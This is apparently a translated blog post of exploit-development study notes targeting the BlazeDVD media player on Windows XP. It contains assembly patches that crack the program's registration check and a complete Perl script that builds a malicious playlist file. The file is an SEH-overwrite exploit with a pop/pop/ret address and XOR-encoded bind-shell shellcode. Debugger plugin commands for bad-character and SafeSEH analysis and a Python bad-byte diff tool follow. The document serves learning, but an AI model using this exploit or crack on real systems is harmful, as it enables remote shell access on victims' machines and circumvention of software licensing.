Learning to use the !pvefindaddr plugin

A randomly downloaded version of BlazeDVD is used for the experiments.

XP SP3, no DEP


First, cracking the program:

Very simple: search the strings directly and patch a few jmps, and it works.

6030324B   . /E9 35030000   jmp Configur.60303585
60303250   > |68 C0003460   push Configur.603400C0                   ;  IsRegistered1
60303255   . |57            push edi
60303256   . |E8 15570100   call Configur.60318970
6030325B   . |83C4 08       add esp,0x8
6030325E   . |85C0          test eax,eax 
60303260     |E9 93000000   jmp Configur.603032F8                  //jmp

603033A1   > 68 A87A3460   push Configur.60347AA8                   ;  IsRegistered3
603033A6   .  57            push edi
603033A7   .  E8 C4550100   call Configur.60318970
603033AC   .  83C4 08       add esp,0x8
603033AF   .  85C0          test eax,eax
603033B1      E9 94000000   jmp Configur.6030344A                  //jmp
603033B6      90            nop

6030344A   > 68 947A3460   push Configur.60347A94                   ;  IsPlaybackTimeOut
6030344F   .  57            push edi
60303450   .  E8 1B550100   call Configur.60318970
60303455   .  83C4 08       add esp,0x8
60303458   .  85C0          test eax,eax
6030345A      EB 1B         jmp XConfigur.60303477
60303477   > 57            push edi
60303478   .  8D4E E8       lea ecx,dword ptr ds:[esi-0x18]
6030347B   .  E8 E0280000   call Configur.60305D60
60303480   .  8BD8          mov ebx,eax
60303482   .  83FB FF       cmp ebx,-0x1
60303485      EB 07         jmp XConfigur.6030348E
60303487   .  33C0          xor eax,eax
60303489   .  E9 F7000000   jmp Configur.60303585
6030348E   >  68 E0773460   push Configur.603477E0                   ;  AutoResumeMode
60303493   .  57            push edi


Originally a reverse-shell shellcode was used, but the "\x1a" character gets detected, so it cannot be used.
Perl script:

my $file = "test.plf";

# pop/pop/ret candidates (addresses as listed by the plugin):
#0x1000ecfa pop ebx; pop ebp; ret
#0x1000ef4a pop esi; pop ebp; ret
#0x1000f00e pop edi; pop esi; ret
#0x100101e7 pop esi; pop ecx; ret
#0x1001028f pop esi; pop ebx; retn 0x0010
#0x100104d7 pop ebx; pop ecx; retn 0x000c
#0x10010511 pop esi; pop ebx; retn 0x000c
#0x1001058a pop ebp; pop ebx; retn 0x0010
#0x10010595 pop ebp; pop ebx; retn 0x0010
#0x1001059f pop ebp; pop ebx; retn 0x0010
#0x100105f1 pop esi; pop ebx; retn 0x000c
my $junk    = "\xcc" x 608;             # padding up to the SEH record
my $nseh    = "\xeb\x1e\x90\x90";       # nSEH: jmp short +0x1e, lands in the nop sled
my $seh     = pack('V', 0x10010511);    # SEH: pop esi; pop ebx; retn 0x000c
my $prejunk = "\x90" x 30;              # nop sled in front of the shellcode
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=x.x.x.x, EXITFUNC=seh,
# bad character: \x1a
my $shellcode =
# decoder stub: finds its own address through fnstenv, then XORs every
# following byte with 0x11 in place until the decoded byte equals 0x90
"\xD9\xEE".                 # fldz
"\xD9\x74\x24\xF4".         # fnstenv [esp-0xc]
"\x58".                     # pop eax           ; eax = address of the fldz
"\x83\xC0\x1b".             # add eax, 0x1b     ; eax = first encoded byte (stub is 27 bytes)
"\x33\xC9".                 # xor ecx, ecx
"\x8A\x1C\x08" .            # mov bl, [eax+ecx]
"\x80\xF3\x11".             # xor bl, 0x11
"\x88\x1C\x08".             # mov [eax+ecx], bl
"\x41" .                    # inc ecx
"\x80\xFB\x90".             # cmp bl, 0x90      ; terminator reached?
"\x75\xF1".                 # jnz back to mov bl, [eax+ecx]
# encoded payload (every byte XOR 0x11); the final \x81 decodes to the \x90 terminator
"\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d".
"\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42".
"\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a".
"\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84".
"\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48".
"\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b".
"\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64".
"\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12".
"\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca".
"\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41".
"\x42\xee\x46\xed\x42\xee\x46\xe9\x81";


my $payload = $junk.$nseh.$seh.$prejunk.$shellcode;

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);              # raw bytes: no newline translation on Windows
print $FILE $payload;
close($FILE);



Next, learning how to check for possible bad characters

!load byakugan

!jutsu memDiff file 302 c:\sploits\shell.txt 0x0012f5de

                                  (shellcode length + file containing the shellcode + start address in memory)

The bold text marks the differences.
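Added example for these notes (not part of the original post, and not code from the byakugan or mona plugins): a stand-alone Python version of the memDiff idea. It writes a known 00-ff pattern (what `!mona bytearray` produces), runs it through a constructed stand-in parser that replaces `\x1a` and strips `\x0d` (an assumption for the demo, not BlazeDVD's real behaviour), and compares the result with the original the way `!jutsu memDiff` compares file bytes with memory. The same comparison is what you run to confirm that an input filter really neutralises the bytes it is supposed to; the `bad_chars` helper also shows why a positional diff alone is misleading once a byte is dropped rather than replaced.

```python
"""memDiff-style bad-character check, as a stand-alone script.

Added example for these notes; it is not part of the original post and not
code from the byakugan or mona plugins. It reproduces the idea behind
`!jutsu memDiff` / `!mona bytearray` + `!mona cmp`: write a known byte
pattern into the input, look at what actually lands in memory, and report
the byte values that were altered or dropped on the way.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


def byte_array(exclude=()) -> bytes:
    """Every value 0x00-0xff except the ones already known to be bad
    (the same pattern `!mona bytearray` writes to a file)."""
    skip = set(exclude)
    return bytes(b for b in range(256) if b not in skip)


@dataclass
class DiffResult:
    first_mismatch: Optional[int]                       # None when both copies agree
    mismatches: List[Tuple[int, int, int]] = field(default_factory=list)  # (offset, expected, found)
    truncated_at: Optional[int] = None                  # memory copy ends before the file does


def mem_diff(expected: bytes, found: bytes) -> DiffResult:
    """Positional comparison, like `!jutsu memDiff file <len> <file> <addr>`:
    `expected` is the file content, `found` the bytes read back from memory."""
    res = DiffResult(first_mismatch=None)
    for off in range(min(len(expected), len(found))):
        if expected[off] != found[off]:
            if res.first_mismatch is None:
                res.first_mismatch = off
            res.mismatches.append((off, expected[off], found[off]))
    if len(found) < len(expected):
        res.truncated_at = len(found)
        if res.first_mismatch is None:
            res.first_mismatch = len(found)
    return res


def bad_chars(expected: bytes, found: bytes) -> Dict[int, str]:
    """Classify each corrupted byte value as 'replaced' (changed in place) or
    'dropped' (removed, shifting everything after it left). A positional diff
    alone cannot tell these apart: one dropped byte makes every later offset
    mismatch. Greedy two-index walk; a replacement whose new value happens to
    equal the next expected byte would be misread as a drop, which is rare
    with a 00-ff pattern."""
    result: Dict[int, str] = {}
    i = j = 0
    while i < len(expected) and j < len(found):
        if expected[i] == found[j]:
            i += 1
            j += 1
        elif i + 1 < len(expected) and expected[i + 1] == found[j]:
            result.setdefault(expected[i], "dropped")
            i += 1
        else:
            result.setdefault(expected[i], "replaced")
            i += 1
            j += 1
    for b in expected[i:]:           # file bytes past the end of the memory copy
        result.setdefault(b, "dropped")
    return result


def simulated_parser(data: bytes) -> bytes:
    """Constructed stand-in for the target's file parser (not BlazeDVD's real
    behaviour): rewrites \\x1a as a space and strips \\x0d entirely."""
    return bytes(b if b != 0x1A else 0x20 for b in data if b != 0x0D)


def report(expected: bytes, found: bytes) -> str:
    """Human-readable summary in the spirit of the plugin output."""
    d = mem_diff(expected, found)
    if d.first_mismatch is None:
        return "buffer intact"
    lines = [f"corruption after byte 0x{d.first_mismatch:x}"]
    if d.truncated_at is not None:
        lines.append(f"memory copy truncated at 0x{d.truncated_at:x}")
    for value, how in sorted(bad_chars(expected, found).items()):
        lines.append(f"  bad char 0x{value:02x}: {how}")
    return "\n".join(lines)


if __name__ == "__main__":
    pattern = byte_array(exclude=[0x00])   # \x00 is assumed bad and left out up front
    print(report(pattern, simulated_parser(pattern)))
```

In real use `found` comes from the debugger (a memory dump at the address passed to memDiff) rather than from `simulated_parser`; the rest is unchanged. Note that the positional diff reports 242 mismatching offsets for the two bad bytes in the demo, which is exactly the misleading picture the two-index classification is there to correct.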

I changed every "\xee" in the shellcode above to "\xcc"; the check is as follows:



!load byakugan

!jutsu identBuf file myShell c:\shell.txt

!jutsu identBuf msfpattern myBuffer 608

!jutsu listBuf


!searchcode jmp esp   also shows the module attributes; needed when looking for specific code under DEP

!aslrdynamicbase   lists the modules with a randomised (dynamic) base



!pvefindaddr        j   jmp/call/ret combinations

            jseh  especially useful when bypassing SafeSEH protection

    nosafeseh  modules not protected by SafeSEH

!packets   used to capture wireless packets: open a web page, attach, run !packets, let it continue, then look at the Captured Packets window

!safeseh   lists the executable modules and indicates whether each one is protected by SafeSEH


!mona bytearray   generates a 00-ff byte array for detecting bad characters


Locate the shellcode position:  !mona cmp -f c:1egg1.bin
Original article: https://www.cnblogs.com/zcc1414/p/3982387.html